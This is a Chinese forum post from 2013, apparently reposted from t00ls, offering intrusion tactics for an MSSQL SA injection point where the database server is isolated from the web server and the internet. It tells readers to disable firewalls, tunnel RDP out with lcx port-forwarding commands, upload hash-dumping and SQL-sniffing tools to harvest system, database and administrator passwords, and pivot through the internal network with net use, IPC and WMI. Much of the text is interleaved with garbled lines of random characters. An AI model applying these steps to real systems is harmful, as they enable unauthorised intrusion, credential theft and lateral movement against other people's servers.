当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
4 @9 W# l7 H' t% b" w+ M
, W1 M) l5 N8 s
. Z7 ?6 Z6 u: t9 j$ J; A* @; J5 x
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
8 E+ H& a- Y) S6 }. q
1 o& q" B& _& ]% {7 X7 Z! m" e/ x! R) j3 a
一、DB机有公网IP.6 h% u) g8 G: W- `) `
$ H$ T- g8 i( R% i1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.# i$ B" o% v C& t" f- ^
- L/ J& D- _; I% [5 w. T, o* G- o
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
9 y2 O( R2 A% P2 t
: Q2 Z6 g, O* |4 f$ r
, l Z5 p1 x+ }) E: s3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
8 i: j( g7 w3 h( n6 ?% ^3 N
7 L/ [9 M/ O/ |* K( P8 E- H
. U0 b% i* @) C# ^& l4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
; r8 E0 j! f4 T/ n/ n- \1 `) x
E3 H% E4 `: ]6 y5 B- Q8 o' D% Y- S% @7 l
$ t# n: I. b: \' x
二、DB机只有内网IP
. W0 g3 }" e! l) E
4 a6 A# z0 f5 y3 o$ P! A1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
8 [ K ?9 b! I8 }
, d$ O) \4 \7 B6 z" W, e
3 G: ]3 X. W& k2 s8 A! m2:停掉防火墙和IP策略再从内往外扫描.
, {3 h. ]# I! d5 Y( Q4 t
) W& j: n+ [1 J- _
Z* k+ [1 l3 c8 p. ~3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.2 n! a$ s$ U/ Y
! g' @, v/ O9 b, j" e" S. `' }' U
5 g% H8 B) x: e% a! `/ d7 d4:学会密码规律分析往往会有惊喜.1 u- ?/ M C% b, o6 i
2 J6 X& s% h) ` g1 \ D! b
0 a( v+ C& f5 K) H
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
: }- g. F+ S+ B: S
( N+ u: |9 E/ P. l( |$ E
' @$ C3 F7 m' Z3 x! v0 }有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对